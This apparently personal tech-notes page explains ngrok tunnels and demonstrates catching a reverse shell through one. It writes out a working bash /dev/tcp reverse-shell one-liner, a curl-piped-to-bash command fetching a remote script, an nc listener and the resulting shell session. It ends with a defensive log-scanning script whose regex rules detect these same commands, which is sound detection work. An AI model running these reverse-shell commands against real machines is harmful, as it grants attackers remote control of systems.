Tech with Tyler

ngrok

Ngrok overview and setting up reverse shells

Last updated 6 months ago

Overview

  • ngrok is a pretty sweet solution for a secure ingress gateway for your apps, services, and APIs. Check the docs to see its use cases

  • With it, we can expose local networked services (like a TCP listener, SSH, or web server) to the public internet through a unique ngrok-generated URL

  • There are methods to build authentication or allowlisting around this but they're not part of the free tier

Registration

  • After signing up for a free ngrok account, follow the setup instructions to get ngrok set up on your machine


Example - Reverse Shell

Ngrok and local listener setup

  • On your machine, start an ngrok TCP tunnel that forwards incoming traffic to local port 1337

ngrok tcp 1337

  • This will provide you with a free forwarding address (you can also set up a custom domain)

ngrok

Policy Management Examples http://ngrok.com/apigwexamples

Session Status                online
Account                       cal (Plan: Free)
Version                       3.18.2
Region                        United States (California) (us-cal-1)
Web Interface                 http://127.0.0.1:4040
Forwarding                    tcp://2.tcp.us-cal-1.ngrok.io:11412 -> localhost:1337

Connections                   ttl     opn     rt1     rt5     p50     p90
                              0       0       0.00    0.00    0.00    0.00

  • You will need a way to catch incoming connections; we can use nc for this like so:

nc -nvlp 1337

Reverse shell setup and execution

  • On a different machine, execute a reverse shell and the traffic should be sent to your machine

bash -c 'bash -i >& /dev/tcp/2.tcp.us-cal-1.ngrok.io/11412 0>&1'

  • Tip - If you're running a bash reverse shell, ensure the current shell is bash, or you'll get an error like the one below (shown here from zsh). Alternatively, invoke bash explicitly with bash -c, as in the command above, which works from any shell as long as bash is installed

zsh: no such file or directory: /dev/tcp/2.tcp.us-cal-1.ngrok.io/11412

  • You can go to the URL in the command below directly in your browser and see the script that would execute

curl https://reverse-shell.sh/2.tcp.us-cal-1.ngrok.io:11412 | bash

  • Once the shell has successfully executed, you should see it in your listener (e.g., nc)

nc -nvlp 1337

listening on [any] 1337 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 56240
bash: no job control in this shell

The default interactive shell is now zsh.
To update your account to use zsh, please run `chsh -s /bin/zsh`.
For more details, please visit https://support.apple.com/kb/HT208050.

bash-3.2$ whoami
tyler

bash-3.2$ hostname
TylerMBP.local

bash-3.2$  

Check out pentestmonkey and revshells for additional reverse shell options

Another option is to use reverse-shell.sh, which acts as a reverse shell as a service
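
From the defender's side, the commands on this page leave recognizable strings in process command-line logs. The following is an added example, not part of the original page: it scans constructed log lines for those strings. The tab-separated log format, the rule names and the generalized ngrok hostname pattern are assumptions.

```python
import re

# Rules built from the commands shown on this page; the rule names are hypothetical.
RULES = {
    # bash redirection to its /dev/tcp/<host>/<port> pseudo-device
    "bash_dev_tcp": re.compile(r"/dev/tcp/[^/\s]+/\d{1,5}\b"),
    # a downloaded script piped straight into a shell
    "pipe_to_shell": re.compile(
        r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b"),
    # ngrok TCP endpoint such as 2.tcp.us-cal-1.ngrok.io:11412; the optional
    # region label is an assumption generalized from that one hostname
    "ngrok_tcp_endpoint": re.compile(
        r"\b\d+\.tcp(?:\.[a-z0-9-]+)?\.ngrok\.io[:/]\d{1,5}\b", re.I),
    # the ngrok agent opening a tunnel from inside the environment
    "ngrok_agent": re.compile(r"\bngrok\s+(?:tcp|http|tls)\b"),
}

# Constructed sample input: host<TAB>user<TAB>command line (assumed log format).
SAMPLE_LOG = (
    "web01\tdeploy\tbash -c bash -i >& /dev/tcp/2.tcp.us-cal-1.ngrok.io/11412 0>&1\n"
    "web01\tdeploy\tcurl https://reverse-shell.sh/2.tcp.us-cal-1.ngrok.io:11412 | bash\n"
    "build02\tci\tcurl -fsSL https://example.com/install.sh -o install.sh\n"
    "build02\tci\tcurl -s https://example.com/pkg.tgz | shasum -a 256\n"
    "laptop7\talice\tngrok tcp 1337\n"
)


def scan(log_text):
    """Return (host, user, matched rule names, command line) per flagged line."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split("\t", 2)
        if len(parts) != 3:
            continue  # skip lines that do not fit the assumed format
        host, user, cmdline = parts
        hits = sorted(name for name, rx in RULES.items() if rx.search(cmdline))
        if hits:
            findings.append((host, user, hits, cmdline))
    return findings


if __name__ == "__main__":
    for host, user, hits, cmdline in scan(SAMPLE_LOG):
        print(f"{host} {user} {','.join(hits)} :: {cmdline}")
```
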
